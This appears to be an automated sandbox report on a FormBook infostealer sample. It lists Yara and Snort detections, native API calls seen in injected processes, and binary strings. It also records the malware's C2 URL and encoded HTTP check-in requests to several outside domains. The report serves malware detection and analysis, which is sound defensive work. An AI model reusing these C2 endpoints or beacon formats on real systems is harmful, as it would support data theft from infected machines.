Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: 9JzK89dRiaBYTuN.exe

Joe Sandbox ML: detected

Source: 1.2.RegSvcs.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 9JzK89dRiaBYTuN.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 9JzK89dRiaBYTuN.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmmon32.pdb source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, cmmon32.exe, 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
Source:	Binary string: RegSvcs.pdb source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop esi	1_2_00415836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop ebx	1_2_00406A67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	1_2_0040C2BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	1_2_0040C3AF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop esi	5_2_00785836
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop ebx	5_2_00776A67
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	5_2_0077C2BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	5_2_0077C3AF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.panyu-qqbaby.com/weni/

Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.regarta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.tapdaugusta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.profitsnavigator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.konversationswithkoshie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.advancedautorepairsonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.lovertons.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.utformehagen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 184.168.131.241 184.168.131.241

Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS

Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.regarta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.tapdaugusta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.profitsnavigator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.konversationswithkoshie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.advancedautorepairsonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.lovertons.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.utformehagen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.regarta.com

Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.346086899.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: cmmon32.exe, 00000005.00000002.604875216.0000000002E3A000.00000004.00000020.sdmp	String found in binary or memory: http://www.sdmdwang.com/weni/?Fzr4otMh=M4L27nnvKueB/wH9
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341446378.0000000000988000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004181C0 NtCreateFile,	1_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00418270 NtReadFile,	1_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004182F0 NtClose,	1_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004183A0 NtAllocateVirtualMemory,	1_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041839A NtAllocateVirtualMemory,	1_2_0041839A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A299A0 NtCreateSection,LdrInitializeThunk,	1_2_01A299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01A29910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A298F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_01A298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01A29860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29840 NtDelayExecution,LdrInitializeThunk,	1_2_01A29840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29A20 NtResumeThread,LdrInitializeThunk,	1_2_01A29A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01A29A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29A50 NtCreateFile,LdrInitializeThunk,	1_2_01A29A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A295D0 NtClose,LdrInitializeThunk,	1_2_01A295D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29540 NtReadFile,LdrInitializeThunk,	1_2_01A29540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A297A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_01A297A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01A29780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29FE0 NtCreateMutant,LdrInitializeThunk,	1_2_01A29FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01A29710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A296E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_01A296E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01A29660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A299D0 NtCreateProcessEx,	1_2_01A299D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29950 NtQueueApcThread,	1_2_01A29950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A298A0 NtWriteVirtualMemory,	1_2_01A298A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29820 NtEnumerateKey,	1_2_01A29820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A2B040 NtSuspendThread,	1_2_01A2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A2A3B0 NtGetContextThread,	1_2_01A2A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29B00 NtSetValueKey,	1_2_01A29B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29A80 NtOpenDirectoryObject,	1_2_01A29A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29A10 NtQuerySection,	1_2_01A29A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A295F0 NtQueryInformationFile,	1_2_01A295F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29520 NtWaitForSingleObject,	1_2_01A29520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A2AD30 NtSetContextThread,	1_2_01A2AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29560 NtWriteFile,	1_2_01A29560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29730 NtQueryVirtualMemory,	1_2_01A29730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A2A710 NtOpenProcessToken,	1_2_01A2A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29760 NtOpenProcess,	1_2_01A29760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29770 NtSetInformationFile,	1_2_01A29770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A2A770 NtOpenThread,	1_2_01A2A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A296D0 NtCreateKey,	1_2_01A296D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29610 NtEnumerateValueKey,	1_2_01A29610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29670 NtQueryInformationProcess,	1_2_01A29670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A29650 NtQueryValueKey,	1_2_01A29650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04A19860
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19840 NtDelayExecution,LdrInitializeThunk,	5_2_04A19840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A199A0 NtCreateSection,LdrInitializeThunk,	5_2_04A199A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A195D0 NtClose,LdrInitializeThunk,	5_2_04A195D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_04A19910
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19540 NtReadFile,LdrInitializeThunk,	5_2_04A19540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A196E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04A196E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A196D0 NtCreateKey,LdrInitializeThunk,	5_2_04A196D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04A19660
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19650 NtQueryValueKey,LdrInitializeThunk,	5_2_04A19650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19A50 NtCreateFile,LdrInitializeThunk,	5_2_04A19A50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19780 NtMapViewOfSection,LdrInitializeThunk,	5_2_04A19780
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19FE0 NtCreateMutant,LdrInitializeThunk,	5_2_04A19FE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19710 NtQueryInformationToken,LdrInitializeThunk,	5_2_04A19710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A198A0 NtWriteVirtualMemory,	5_2_04A198A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A198F0 NtReadVirtualMemory,	5_2_04A198F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19820 NtEnumerateKey,	5_2_04A19820
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A1B040 NtSuspendThread,	5_2_04A1B040
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A195F0 NtQueryInformationFile,	5_2_04A195F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A199D0 NtCreateProcessEx,	5_2_04A199D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19520 NtWaitForSingleObject,	5_2_04A19520
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A1AD30 NtSetContextThread,	5_2_04A1AD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19560 NtWriteFile,	5_2_04A19560
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19950 NtQueueApcThread,	5_2_04A19950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19A80 NtOpenDirectoryObject,	5_2_04A19A80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19A20 NtResumeThread,	5_2_04A19A20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19A00 NtProtectVirtualMemory,	5_2_04A19A00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19610 NtEnumerateValueKey,	5_2_04A19610
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19A10 NtQuerySection,	5_2_04A19A10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19670 NtQueryInformationProcess,	5_2_04A19670
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A197A0 NtUnmapViewOfSection,	5_2_04A197A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A1A3B0 NtGetContextThread,	5_2_04A1A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19730 NtQueryVirtualMemory,	5_2_04A19730
